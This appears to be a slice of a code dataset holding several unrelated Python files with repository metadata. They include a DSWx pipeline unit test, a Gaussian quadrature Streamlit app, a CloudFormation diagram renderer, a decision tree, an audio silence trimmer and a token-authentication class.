input_files_group['InputFilePaths'] = [runconfig_path]
with open(test_runconfig_path, 'w', encoding='utf-8') as runconfig_fh:
yaml.safe_dump(runconfig_dict, runconfig_fh, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Input file {abspath(runconfig_path)} does not have "
f".tif extension", log_contents)
finally:
if os.path.exists(test_runconfig_path):
os.unlink(test_runconfig_path)
def test_dswx_pge_output_validation(self):
"""Test the output validation checks made by DSWxPostProcessorMixin."""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
with open(runconfig_path, 'r', encoding='utf-8') as stream:
runconfig_dict = yaml.safe_load(stream)
product_path_group = runconfig_dict['RunConfig']['Groups']['PGE']['ProductPathGroup']
primary_executable_group = runconfig_dict['RunConfig']['Groups']['PGE']['PrimaryExecutable']
# Test with a SAS command that does not produce any output file,
# post-processor should detect that expected output is missing
product_path_group['SASOutputFile'] = 'missing_dswx_hls.tif'
primary_executable_group['ProgramPath'] = 'echo'
primary_executable_group['ProgramOptions'] = ['hello world']
with open(test_runconfig_path, 'w', encoding='utf-8') as config_fh:
yaml.safe_dump(runconfig_dict, config_fh, sort_keys=False)
try:
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_output_file = 'dswx_pge_test/output_dir/missing_dswx_hls.tif'
self.assertFalse(os.path.exists(expected_output_file))
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Expected SAS output file {abspath(expected_output_file)} "
f"does not exist", log_contents)
# Test with a SAS command that produces the expected output file, but
# one that is empty (size 0 bytes). Post-processor should detect this
# and flag an error
product_path_group['SASOutputFile'] = 'empty_dswx_hls.tif'
primary_executable_group['ProgramPath'] = 'touch'
primary_executable_group['ProgramOptions'] = ['dswx_pge_test/output_dir/empty_dswx_hls.tif']
with open(test_runconfig_path, 'w', encoding='utf-8') as outfile:
yaml.safe_dump(runconfig_dict, outfile, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_output_file = 'dswx_pge_test/output_dir/empty_dswx_hls.tif'
self.assertTrue(os.path.exists(expected_output_file))
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"SAS output file {abspath(expected_output_file)} was "
f"created but is empty", log_contents)
finally:
if os.path.exists(test_runconfig_path):
os.unlink(test_runconfig_path)
if __name__ == "__main__":
unittest.main()
| 0 | 0 | 0 |
a1ae20c0408cb75fb662bcc96a4b99d348f868e8 | 1,510 | py | Python | src/tasks/task6/6_1_complex_gauss.py | Furetur/ComputationalMath | 5c49adf97eb3408bb4ae10be04f0df6988f73ac0 | [
"MIT"
] | null | null | null | src/tasks/task6/6_1_complex_gauss.py | Furetur/ComputationalMath | 5c49adf97eb3408bb4ae10be04f0df6988f73ac0 | [
"MIT"
] | null | null | null | src/tasks/task6/6_1_complex_gauss.py | Furetur/ComputationalMath | 5c49adf97eb3408bb4ae10be04f0df6988f73ac0 | [
"MIT"
] | null | null | null | import sys
from typing import List, Callable, Protocol
import pandas as pd
import streamlit as st
import seaborn as sns
import sympy as sp
from sympy.abc import x as x_symbol
import matplotlib.pyplot as plt
import numpy as np
from numpy.polynomial import Polynomial
sys.path.append('')
sys.path.append('../../..')
from src.common.qf.complex_gauss import calc_complex_gauss
from src.common.utils import integrate, err, rel_err
from src.common.qf.qf_utils import calc_qf, plot_qf
from src.common.polynomial.legendre import legendres
from src.common.qf.gauss import gauss_qf
from src.common.segment import Segment
from src.common.streamlit import function_input, segment_input
st.write("# 6.1 Применение составной КФ Гаусса")
with st.form('main'):
f_expr, f_lambda = function_input("sqrt(1-x)*sin(x)")
a, b = segment_input(default_a=0.0, default_b=1.0)
st.form_submit_button()
N = st.sidebar.number_input(min_value=1, value=2 , label='N: кол-во узлов')
m = st.sidebar.number_input(min_value=1, label='m: кол-во разбиений')
domain = Segment(a, b)
partitions = domain.split(m)
st.write(f_expr)
J = integrate(f_expr, domain)
J_approx = calc_complex_gauss(N, partitions, f_lambda)
with st.expander(label='Более подробно'):
nodes, coefs = gauss_qf(N)
gauss_df = pd.DataFrame({"Узлы": nodes, "Коэф.": coefs})
st.dataframe(gauss_df)
st.latex(f"J = {J}")
st.latex(f"J_{{approx}} = {J_approx}")
st.latex(f"Error = {err(J, J_approx)}")
st.latex(f"Rel.Error = {rel_err(J, J_approx)}\%")
| 28.490566 | 75 | 0.739735 | import sys
from typing import List, Callable, Protocol
import pandas as pd
import streamlit as st
import seaborn as sns
import sympy as sp
from sympy.abc import x as x_symbol
import matplotlib.pyplot as plt
import numpy as np
from numpy.polynomial import Polynomial
sys.path.append('')
sys.path.append('../../..')
from src.common.qf.complex_gauss import calc_complex_gauss
from src.common.utils import integrate, err, rel_err
from src.common.qf.qf_utils import calc_qf, plot_qf
from src.common.polynomial.legendre import legendres
from src.common.qf.gauss import gauss_qf
from src.common.segment import Segment
from src.common.streamlit import function_input, segment_input
st.write("# 6.1 Применение составной КФ Гаусса")
with st.form('main'):
f_expr, f_lambda = function_input("sqrt(1-x)*sin(x)")
a, b = segment_input(default_a=0.0, default_b=1.0)
st.form_submit_button()
N = st.sidebar.number_input(min_value=1, value=2 , label='N: кол-во узлов')
m = st.sidebar.number_input(min_value=1, label='m: кол-во разбиений')
domain = Segment(a, b)
partitions = domain.split(m)
st.write(f_expr)
J = integrate(f_expr, domain)
J_approx = calc_complex_gauss(N, partitions, f_lambda)
with st.expander(label='Более подробно'):
nodes, coefs = gauss_qf(N)
gauss_df = pd.DataFrame({"Узлы": nodes, "Коэф.": coefs})
st.dataframe(gauss_df)
st.latex(f"J = {J}")
st.latex(f"J_{{approx}} = {J_approx}")
st.latex(f"Error = {err(J, J_approx)}")
st.latex(f"Rel.Error = {rel_err(J, J_approx)}\%")
| 0 | 0 | 0 |
a934dbcd7616fcb30469f78f0fe63ba5fc4a0dd7 | 6,084 | py | Python | cfnviz/renderers.py | devquixote/cfnviz | e5363cbf1efef72acbe9e0cad1bc4374b682085c | [
"MIT"
] | null | null | null | cfnviz/renderers.py | devquixote/cfnviz | e5363cbf1efef72acbe9e0cad1bc4374b682085c | [
"MIT"
] | null | null | null | cfnviz/renderers.py | devquixote/cfnviz | e5363cbf1efef72acbe9e0cad1bc4374b682085c | [
"MIT"
] | null | null | null |
default_values = {
"ranksep": "0.4",
"nodesep": "0.4",
"font": "arial",
"bold_font": "arial bold",
"fontcolor": "grey15",
"edgecolor": "grey15",
"clear": "white"
}
digraph_template = """
digraph cfn_template {{
graph [
rankdir="TB";
fontname="{font}";
]
concentrate=true;
ratio=compress;
ranksep="{ranksep}";
nodesep="{nodesep}";
node [shape=box,fontname="{font}",fontcolor="{fontcolor}"];
edge [arrowhead="vee",color="{edgecolor}"];
subgraph everything_but_resources {{
color="{clear}";
{outputs_cluster}
{conditions_cluster}
{mappings_cluster}
{parameters_cluster}
{non_resource_edges} [style=invis]
}}
{resources_cluster}
}}
"""
subgraph_template = """
subgraph cluster_{label} {{
label="{label}";
fontsize="36";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=record]
{element_type} [
label="{{{elements}}}";
]
}}
"""
resource_subgraph_template = """
subgraph cluster_resources {{
label="Resources";
fontsize="36";
fontname="{font}";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=none]
{resource_nodes}
{resource_edges}
}}
"""
resource_type_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" COLSPAN="2"><FONT POINT-SIZE="10">{type_path}</FONT><BR/>{type}</TD>
</TR>
'''
resource_name_row_view = '''
<TR>
<TD BORDER="0" CELLPADDING="10" COLSPAN="2"><FONT POINT-SIZE="28" FACE="{bold_font}" COLOR="{clear}">{name}</FONT></TD>
</TR>
'''
resource_attribute_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" VALIGN="top" ALIGN="RIGHT">{name}:</TD>
<TD BORDER="0" BGCOLOR="{clear}" ALIGN="LEFT">{values}</TD>
</TR>
'''
resource_node_view = '''
{name} [
label=<
<TABLE BORDER="1" BGCOLOR="grey65" COLOR="grey15" CELLPADDING="3" CELLSPACING="0">
{type_row}
{name_row}
{attribute_rows}
</TABLE>
>
]
'''
| 28.297674 | 131 | 0.607002 |
default_values = {
"ranksep": "0.4",
"nodesep": "0.4",
"font": "arial",
"bold_font": "arial bold",
"fontcolor": "grey15",
"edgecolor": "grey15",
"clear": "white"
}
digraph_template = """
digraph cfn_template {{
graph [
rankdir="TB";
fontname="{font}";
]
concentrate=true;
ratio=compress;
ranksep="{ranksep}";
nodesep="{nodesep}";
node [shape=box,fontname="{font}",fontcolor="{fontcolor}"];
edge [arrowhead="vee",color="{edgecolor}"];
subgraph everything_but_resources {{
color="{clear}";
{outputs_cluster}
{conditions_cluster}
{mappings_cluster}
{parameters_cluster}
{non_resource_edges} [style=invis]
}}
{resources_cluster}
}}
"""
subgraph_template = """
subgraph cluster_{label} {{
label="{label}";
fontsize="36";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=record]
{element_type} [
label="{{{elements}}}";
]
}}
"""
resource_subgraph_template = """
subgraph cluster_resources {{
label="Resources";
fontsize="36";
fontname="{font}";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=none]
{resource_nodes}
{resource_edges}
}}
"""
resource_type_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" COLSPAN="2"><FONT POINT-SIZE="10">{type_path}</FONT><BR/>{type}</TD>
</TR>
'''
resource_name_row_view = '''
<TR>
<TD BORDER="0" CELLPADDING="10" COLSPAN="2"><FONT POINT-SIZE="28" FACE="{bold_font}" COLOR="{clear}">{name}</FONT></TD>
</TR>
'''
resource_attribute_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" VALIGN="top" ALIGN="RIGHT">{name}:</TD>
<TD BORDER="0" BGCOLOR="{clear}" ALIGN="LEFT">{values}</TD>
</TR>
'''
resource_node_view = '''
{name} [
label=<
<TABLE BORDER="1" BGCOLOR="grey65" COLOR="grey15" CELLPADDING="3" CELLSPACING="0">
{type_row}
{name_row}
{attribute_rows}
</TABLE>
>
]
'''
class DotRenderer(object):
def __init__(self, model):
self.model = model
def __call__(self):
output_names = [output.name for output in self.model.outputs]
condition_names = [cond.name for cond in self.model.conditions]
mapping_keys = [mapping.key for mapping in self.model.mappings]
parameter_names = [param.name for param in self.model.parameters]
context = default_values.copy()
context['outputs_cluster'] = self.__render_subgraph(
"Outputs", "Outputs", output_names)
context['conditions_cluster'] = self.__render_subgraph(
"Conditions", "Conditions", condition_names)
context['mappings_cluster'] = self.__render_subgraph(
"Mappings", "Mappings", mapping_keys)
context['parameters_cluster'] = self.__render_subgraph(
"Parameters", "Parameters", parameter_names)
context['non_resource_edges'] = self.__render_non_resource_edges()
context['resources_cluster'] = self.__render_resources_subgraph()
return digraph_template.format(**context)
def __render_non_resource_edges(self):
# Parameters -> Mappings -> Conditions -> Outputs [style=invis]
elements = []
if self.model.parameters:
elements.append('Parameters')
if self.model.mappings:
elements.append('Mappings')
if self.model.conditions:
elements.append('Conditions')
if self.model.outputs:
elements.append('Outputs')
return " -> ".join(elements)
def __render_resources_subgraph(self):
context = default_values.copy()
context['resource_nodes'] = self.__render_resources()
context['resource_edges'] = self.__render_edges()
return resource_subgraph_template.format(**context)
def __render_resources(self):
renderings = []
model = self.model
for resource in sorted(self.model.resources.values(),
key=lambda resource: len(resource.attributes)):
context = default_values.copy()
context['name'] = resource.name
context['type_row'] = self.__render_type_row(resource.type)
context['name_row'] = self.__render_name_row(resource.name)
context['attribute_rows'] = self.__render_attribute_rows(
resource.attributes)
renderings.append(resource_node_view.format(**context))
return "\n".join(renderings)
def __render_type_row(self, resource_type):
context = default_values.copy()
type_elements = resource_type.split("::")
context['type'] = type_elements.pop()
context['type_path'] = "::".join(type_elements)
return resource_type_row_view.format(**context)
def __render_name_row(self, resource_name):
context = default_values.copy()
context['name'] = resource_name
return resource_name_row_view.format(**context)
def __render_attribute_rows(self, attributes):
rows = []
for attribute in attributes.values():
context = default_values.copy()
context['name'] = attribute.name
context['values'] = '<BR ALIGN="LEFT"/>'.join(attribute.refers_to)
rows.append(resource_attribute_row_view.format(**context))
return "\n".join(rows)
def __render_subgraph(self, label, element_type, elements):
if not elements:
return ''
context = default_values.copy()
context['label'] = label
context['element_type'] = element_type
context['elements'] = "|".join(elements)
return subgraph_template.format(**context)
def __render_edges(self):
tmpl = " {source} -> {dest}"
edge_renderings = [tmpl.format(source=edge.source, dest=edge.dest)
for edge in self.model.resource_edges]
return "\n".join(edge_renderings)
| 3,676 | 5 | 292 |
455c63f3f9be56967fa465ef942df3ac3f71873f | 197 | py | Python | scripts/poop_count.py | k1o0/iblrig | 9177b852b344a9bbc26e4a4aeb5f0182bd8a9b25 | [
"MIT"
] | 13 | 2018-08-07T21:56:08.000Z | 2021-12-06T17:53:37.000Z | scripts/poop_count.py | k1o0/iblrig | 9177b852b344a9bbc26e4a4aeb5f0182bd8a9b25 | [
"MIT"
] | 360 | 2018-07-24T16:35:26.000Z | 2022-03-23T15:28:56.000Z | scripts/poop_count.py | k1o0/iblrig | 9177b852b344a9bbc26e4a4aeb5f0182bd8a9b25 | [
"MIT"
] | 15 | 2019-03-12T16:25:05.000Z | 2021-09-06T10:30:24.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Niccolò Bonacchi
# @Date: Thursday, January 31st 2019, 4:12:19 pm
from iblrig.poop_count import poop
if __name__ == "__main__":
poop()
| 19.7 | 48 | 0.670051 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Niccolò Bonacchi
# @Date: Thursday, January 31st 2019, 4:12:19 pm
from iblrig.poop_count import poop
if __name__ == "__main__":
poop()
| 0 | 0 | 0 |
eb38b982a137c05786ede3bb3be0701c9f445431 | 2,349 | py | Python | machine_learning/algorithms/decision_tree.py | z-yin/Leetcode-learning | e84c2fb067b767ed5f24d8736274c7ebce5dc00e | [
"MIT"
] | 1 | 2019-07-31T08:44:45.000Z | 2019-07-31T08:44:45.000Z | machine_learning/algorithms/decision_tree.py | z-yin/Leetcode-learning | e84c2fb067b767ed5f24d8736274c7ebce5dc00e | [
"MIT"
] | null | null | null | machine_learning/algorithms/decision_tree.py | z-yin/Leetcode-learning | e84c2fb067b767ed5f24d8736274c7ebce5dc00e | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
if __name__ == "__main__":
d = pd.read_csv('your.txt')
dt = DecisionTree(d, 'ID3')
print(dt.tree)
| 31.32 | 69 | 0.530013 | import numpy as np
import pandas as pd
class DecisionTree:
def __init__(self, df, method='C4.5', eps=0.01):
self.df = pd.DataFrame(df)
self.eps = eps
self.method = method
self.tree = self.create_tree(self.df)
def entropy(self, count):
p = count / count.sum()
p = p[p != 0]
return -p.dot(np.log2(p))
def conditional_entropy(self, cb):
w = cb.sum(1) / cb.to_numpy().sum()
HDi = cb.apply(self.entropy, 'columns')
return w.dot(HDi)
def weight_entropy(self, cbs):
w = [cb.sum(1) / cb.to_numpy().sum() for cb in cbs]
enpy = [-i.dot(np.log2(i)) for i in w]
return np.array(enpy)
def split_data(self, df):
labels = df.iloc[:, -1]
data = df.iloc[:, :-1]
# calculate HD
ck = labels.groupby(labels).count()
HD = self.entropy(ck)
# calculate HDA
cbs = [pd.crosstab(data.iloc[:, i], labels)
for i in range(data.columns.size)]
HDA = np.array([self.conditional_entropy(cb) for cb in cbs])
if self.method == 'ID3':
g = HD - HDA
elif self.method == 'C4.5':
# calculate HAD, not HDA
HAD = self.weight_entropy(cbs)
g = np.ndarray(shape=HAD.shape)
np.divide((HD - HDA), HAD, g)
# if largest gain is less than eps
if g.max() < self.eps:
return labels.mode().iloc[0]
split_index = g.argmax()
name = df.columns[split_index]
children = df.groupby(df.iloc[:, split_index])
return ((name, i, d.drop(name, axis=1)) for i, d in children)
def create_tree(self, df):
if df.iloc[:, -1].unique().size == 1: # single class
return df.iloc[0, -1]
if df.columns.size == 1: # A = empty
return df.mode().iloc[0, 0]
sub_df = self.split_data(df)
# if largest gain is less than eps
if isinstance(sub_df, str):
return sub_df
# if largest gain is larger than eps
res = {}
for name, i, d in sub_df:
if name not in res:
res[name] = {}
res[name][i] = self.create_tree(d)
return res
if __name__ == "__main__":
d = pd.read_csv('your.txt')
dt = DecisionTree(d, 'ID3')
print(dt.tree)
| 2,015 | -2 | 184 |
f30258d9ca96fed4ef315dd00ebade4bfd523f26 | 2,947 | py | Python | models/utils/tmp.py | PatrickHua/FeatureDecorrelationSSL | 408bd9e8d71a2a1962a3ca4d8d9a2476bf561734 | [
"MIT"
] | null | null | null | models/utils/tmp.py | PatrickHua/FeatureDecorrelationSSL | 408bd9e8d71a2a1962a3ca4d8d9a2476bf561734 | [
"MIT"
] | null | null | null | models/utils/tmp.py | PatrickHua/FeatureDecorrelationSSL | 408bd9e8d71a2a1962a3ca4d8d9a2476bf561734 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pickle
from whiten_norm import Whitening1d, whiten_tensor_svd
from decorrelated_batch_norm import DBN
# from norm_tests import get_corrcoef
file = "/Users/tiany/Downloads/input.pkl"
with open(file, 'rb') as f:
data = pickle.load(f)
# wn = Whitening1d(data.shape[1], eps=0)
dbn = DBN(data.shape[1], eps=0, num_channels=1, dim=2, affine=False)
# x =
# data = torch.rand_like(torch.from_numpy(data)).numpy()
# data = torch.rand((64, 512)).numpy()
# print(np.abs(np.corrcoef(data, rowvar=False)).mean())
print(get_corrcoef(data))
# y = whiten_tensor_svd(torch.from_numpy(data)).numpy()
# y = wn(torch.from_numpy(data)).numpy()
breakpoint()
y = dbn(torch.from_numpy(data)).numpy()
# print(np.abs(np.corrcoef(y, rowvar=False)).mean())
print(get_corrcoef(y))
breakpoint()
x = np.array([
[-1, 0],
[1, 0]
])
print(get_corrcoef(x))
print(np.cov(x, rowvar=False))
# class DecorBatchNorm1d(nn.Module):
# def __init__(self, num_features, num_groups=32, num_channels=0, ndim=2, eps=1e-5, momentum=0.1, gamma=True, beta=True):
# super(DecorBatchNorm1d, self).__init__()
# if num_channels > 0:
# num_groups = num_features // num_channels
# self.num_features = num_features
# self.num_groups = num_groups
# assert self.num_features % self.num_groups == 0
# self.dim = dim
# self.eps = eps
# self.mmomentum = momentum
# # self.affine = affine
# self.gamma = gamma
# self.beta = beta
# self.mode = mode
# self.ndim = ndim
# # if self.affine:
# # self.weight = nn.Parameter(torch.Tensor(self.num_features))
# # self.bias = nn.Parameter(torch.Tensor(self.num_features))
# self.register_parameter('weight', nn.Parameter(torch.ones(num_features)) if gamma else None)
# self.register_parameter('bias', nn.Parameter(torch.zeros(num_features)) if beta else None)
# self.register_buffer('running_mean', torch.zeros(num_features))
# self.register_buffer('running_projection', torch.eye(num_features))
# self.reset_parameter()
# def reset_parameter(self):
# if self.gamma: nn.init.ones_(self.weight)
# if self.beta: nn.init.zeros_(self.bias)
# def forward(self, x):
# if self.training:
# mean = x.mean(dim=1, keepdim=True)
# self.running_mean = (1-self.momentum) * self.running_mean + self.mmomentum * mean
# x = x - mean
# cov = x.matmut(x.t()) / x.size(1) + self.eps * torch.eye()
# u, eig, _ = cov.cpu().svd()
| 31.351064 | 125 | 0.633526 | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pickle
from whiten_norm import Whitening1d, whiten_tensor_svd
from decorrelated_batch_norm import DBN
# from norm_tests import get_corrcoef
def get_corrcoef(x):
corr_mat = np.corrcoef(x, rowvar=False)
# print(corr_mat)
# print(np.cov(x, rowvar=False))
# print(np.cov(x, rowvar=False))
np.fill_diagonal(corr_mat, 0)
return np.abs(corr_mat).mean()
file = "/Users/tiany/Downloads/input.pkl"
with open(file, 'rb') as f:
data = pickle.load(f)
# wn = Whitening1d(data.shape[1], eps=0)
dbn = DBN(data.shape[1], eps=0, num_channels=1, dim=2, affine=False)
# x =
# data = torch.rand_like(torch.from_numpy(data)).numpy()
# data = torch.rand((64, 512)).numpy()
# print(np.abs(np.corrcoef(data, rowvar=False)).mean())
print(get_corrcoef(data))
# y = whiten_tensor_svd(torch.from_numpy(data)).numpy()
# y = wn(torch.from_numpy(data)).numpy()
breakpoint()
y = dbn(torch.from_numpy(data)).numpy()
# print(np.abs(np.corrcoef(y, rowvar=False)).mean())
print(get_corrcoef(y))
breakpoint()
x = np.array([
[-1, 0],
[1, 0]
])
print(get_corrcoef(x))
print(np.cov(x, rowvar=False))
# class DecorBatchNorm1d(nn.Module):
# def __init__(self, num_features, num_groups=32, num_channels=0, ndim=2, eps=1e-5, momentum=0.1, gamma=True, beta=True):
# super(DecorBatchNorm1d, self).__init__()
# if num_channels > 0:
# num_groups = num_features // num_channels
# self.num_features = num_features
# self.num_groups = num_groups
# assert self.num_features % self.num_groups == 0
# self.dim = dim
# self.eps = eps
# self.mmomentum = momentum
# # self.affine = affine
# self.gamma = gamma
# self.beta = beta
# self.mode = mode
# self.ndim = ndim
# # if self.affine:
# # self.weight = nn.Parameter(torch.Tensor(self.num_features))
# # self.bias = nn.Parameter(torch.Tensor(self.num_features))
# self.register_parameter('weight', nn.Parameter(torch.ones(num_features)) if gamma else None)
# self.register_parameter('bias', nn.Parameter(torch.zeros(num_features)) if beta else None)
# self.register_buffer('running_mean', torch.zeros(num_features))
# self.register_buffer('running_projection', torch.eye(num_features))
# self.reset_parameter()
# def reset_parameter(self):
# if self.gamma: nn.init.ones_(self.weight)
# if self.beta: nn.init.zeros_(self.bias)
# def forward(self, x):
# if self.training:
# mean = x.mean(dim=1, keepdim=True)
# self.running_mean = (1-self.momentum) * self.running_mean + self.mmomentum * mean
# x = x - mean
# cov = x.matmut(x.t()) / x.size(1) + self.eps * torch.eye()
# u, eig, _ = cov.cpu().svd()
| 208 | 0 | 24 |
181544942dd95274c5af256c8de449f2402bce01 | 3,857 | py | Python | trimmer.py | ktho22/vctts | 84e8bc6c4b5586aa319c7c21c4325f879f2cd3ba | [
"MIT"
] | 17 | 2020-08-31T09:36:54.000Z | 2022-02-15T03:15:09.000Z | trimmer.py | Lukelluke/vctts | 84e8bc6c4b5586aa319c7c21c4325f879f2cd3ba | [
"MIT"
] | null | null | null | trimmer.py | Lukelluke/vctts | 84e8bc6c4b5586aa319c7c21c4325f879f2cd3ba | [
"MIT"
] | 4 | 2020-09-19T11:50:24.000Z | 2022-02-19T14:57:43.000Z | import webrtcvad, os, wave, contextlib, collections, argparse
if __name__=='__main__':
parser = argparse.ArgumentParser(description='training script')
parser.add_argument('--in_dir', type=str, help='type dataset for trimming')
parser.add_argument('--out_dir', type=str, help='type dataset for trimming')
args = parser.parse_args()
if not args.in_dir or not args.out_dir:
parser.error('--in_dir and --out_dir should be given')
in_dir = args.in_dir
out_dir = args.out_dir
# ------ trimming scilence using VAD
os.makedirs(out_dir, exist_ok=True)
trim(in_dir, out_dir)
| 38.188119 | 104 | 0.618097 | import webrtcvad, os, wave, contextlib, collections, argparse
def read_wave(path):
with contextlib.closing(wave.open(path, 'rb')) as wf:
num_channels = wf.getnchannels()
assert num_channels == 1
sample_width = wf.getsampwidth()
assert sample_width == 2
sample_rate = wf.getframerate()
pcm_data = wf.readframes(wf.getnframes())
return pcm_data, sample_rate
def write_wave(path, audio, sample_rate):
with contextlib.closing(wave.open(path, 'wb')) as wf:
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(sample_rate)
wf.writeframes(audio)
class Frame(object):
def __init__(self, bytes, timestamp, duration):
self.bytes = bytes
self.timestamp = timestamp
self.duration = duration
def frame_generator(frame_duration_ms, audio, sample_rate):
n = int(sample_rate * (frame_duration_ms / 1000.0) * 2)
offset = 0
timestamp = 0.0
duration = (float(n) / sample_rate) / 2.0
output = []
while offset + n < len(audio):
output.append(Frame(audio[offset:offset + n], timestamp, duration))
timestamp += duration
offset += n
return output
def vad_collector(sample_rate, frame_duration_ms, padding_duration_ms, frames, filename):
num_padding_frames = int(padding_duration_ms / frame_duration_ms)
ring_buffer = collections.deque(maxlen=num_padding_frames)
triggered = False
aggressiveness = 3
while aggressiveness >= 0:
vad = webrtcvad.Vad(aggressiveness)
voiced_frames = []
for frame in frames:
if not triggered: #unvoiced part
ring_buffer.append(frame)
num_voiced = len([f for f in ring_buffer
if vad.is_speech(f.bytes, sample_rate)])
if num_voiced > 0.3 * ring_buffer.maxlen:
triggered = True
voiced_frames.extend(ring_buffer)
ring_buffer.clear()
else: #voiced part
voiced_frames.append(frame)
ring_buffer.append(frame)
num_unvoiced = len([f for f in ring_buffer
if not vad.is_speech(f.bytes, sample_rate)])
if num_unvoiced > 0.3 * ring_buffer.maxlen:
triggered = False
ring_buffer.clear()
if voiced_frames:
return b''.join([f.bytes for f in voiced_frames])
aggressiveness -= 1
print('Could not find voice activity at', filename)
return b''.join([f.bytes for f in frames])
def trim(rDirectory, wDirectory):
frame_duration_ms = 30
padding_duration_ms = 300
# print("read dir: ", rDirectory)
for root, dirnames, filenames in os.walk(rDirectory):
for filename in filenames:
if filename[-4:] == '.wav':
rf = os.path.join(root, filename)
audio, sample_rate = read_wave(rf)
frames = frame_generator(frame_duration_ms, audio, sample_rate)
segment = vad_collector(sample_rate, frame_duration_ms, padding_duration_ms, frames, rf)
wPath = str(wDirectory + '/' + filename)
write_wave(wPath, segment, sample_rate)
if __name__=='__main__':
parser = argparse.ArgumentParser(description='training script')
parser.add_argument('--in_dir', type=str, help='type dataset for trimming')
parser.add_argument('--out_dir', type=str, help='type dataset for trimming')
args = parser.parse_args()
if not args.in_dir or not args.out_dir:
parser.error('--in_dir and --out_dir should be given')
in_dir = args.in_dir
out_dir = args.out_dir
# ------ trimming scilence using VAD
os.makedirs(out_dir, exist_ok=True)
trim(in_dir, out_dir)
| 3,066 | -1 | 164 |
1d9520a85e48fe18366f4416970e0a635c02e35b | 299 | py | Python | python/setadm.py | beaglecode/skytools | 01851e5e21f3f923b6266285596db6d64958eb74 | [
"0BSD"
] | 116 | 2015-01-06T17:56:12.000Z | 2021-08-16T06:33:01.000Z | python/setadm.py | beaglecode/skytools | 01851e5e21f3f923b6266285596db6d64958eb74 | [
"0BSD"
] | 17 | 2015-02-17T17:50:53.000Z | 2020-01-15T08:05:46.000Z | python/setadm.py | beaglecode/skytools | 01851e5e21f3f923b6266285596db6d64958eb74 | [
"0BSD"
] | 51 | 2015-02-18T16:12:13.000Z | 2021-03-07T19:22:58.000Z | #! /usr/bin/env python
"""SetAdmin launcher.
"""
import sys
import pkgloader
pkgloader.require('skytools', '3.0')
import pgq.cascade.admin
if __name__ == '__main__':
script = pgq.cascade.admin.CascadeAdmin('cascade_admin', 'node_db', sys.argv[1:], worker_setup = False)
script.start()
| 17.588235 | 107 | 0.698997 | #! /usr/bin/env python
"""SetAdmin launcher.
"""
import sys
import pkgloader
pkgloader.require('skytools', '3.0')
import pgq.cascade.admin
if __name__ == '__main__':
script = pgq.cascade.admin.CascadeAdmin('cascade_admin', 'node_db', sys.argv[1:], worker_setup = False)
script.start()
| 0 | 0 | 0 |
efb102dfd9e2fff9e7cebc30a2150802d7069f10 | 1,369 | py | Python | src/dataloaderservices/auth.py | ODM2/ODM2DataSharingPortal | 4ea1d633fe8e1cc39916e83041f2dbc830339e55 | [
"BSD-3-Clause"
] | 18 | 2018-11-27T11:57:24.000Z | 2022-03-19T16:52:35.000Z | src/dataloaderservices/auth.py | ODM2/ODM2DataSharingPortal | 4ea1d633fe8e1cc39916e83041f2dbc830339e55 | [
"BSD-3-Clause"
] | 362 | 2018-02-21T16:27:00.000Z | 2022-03-31T18:48:48.000Z | src/dataloaderservices/auth.py | ODM2/ODM2DataSharingPortal | 4ea1d633fe8e1cc39916e83041f2dbc830339e55 | [
"BSD-3-Clause"
] | 5 | 2018-07-04T17:13:09.000Z | 2021-12-19T22:51:40.000Z | from rest_framework import authentication
from rest_framework import exceptions
from dataloaderinterface.models import SiteRegistration
| 42.78125 | 104 | 0.711468 | from rest_framework import authentication
from rest_framework import exceptions
from dataloaderinterface.models import SiteRegistration
class UUIDAuthentication(authentication.BaseAuthentication):
def authenticate(self, request):
if request.META['REQUEST_METHOD'] != 'POST':
return None
if 'HTTP_TOKEN' not in request.META:
raise exceptions.ParseError("Registration Token not present in the request.")
elif 'sampling_feature' not in request.data:
raise exceptions.ParseError("Sampling feature UUID not present in the request.")
# Get auth_token(uuid) from header,
# get registration object with auth_token,
# get the user from that registration,
# verify sampling_feature uuid is registered by this user,
# be happy.
token = request.META['HTTP_TOKEN']
registration = SiteRegistration.objects.filter(registration_token=token).first()
if not registration:
raise exceptions.PermissionDenied('Invalid Security Token')
# request needs to have the sampling feature uuid of the registration -
if str(registration.sampling_feature.sampling_feature_uuid) != request.data['sampling_feature']:
raise exceptions.AuthenticationFailed('Site Identifier is not associated with this Token')
return None
| 1,143 | 39 | 49 |
1514f9195fe3c618b0c34f004455c6fb3197fe14 | 7,436 | py | Python | lakesuperior/model/ldp_factory.py | mbklein/lakesuperior | 5829a337bfd4120c6a8fa65ff4cd219f8690210a | [
"Apache-2.0"
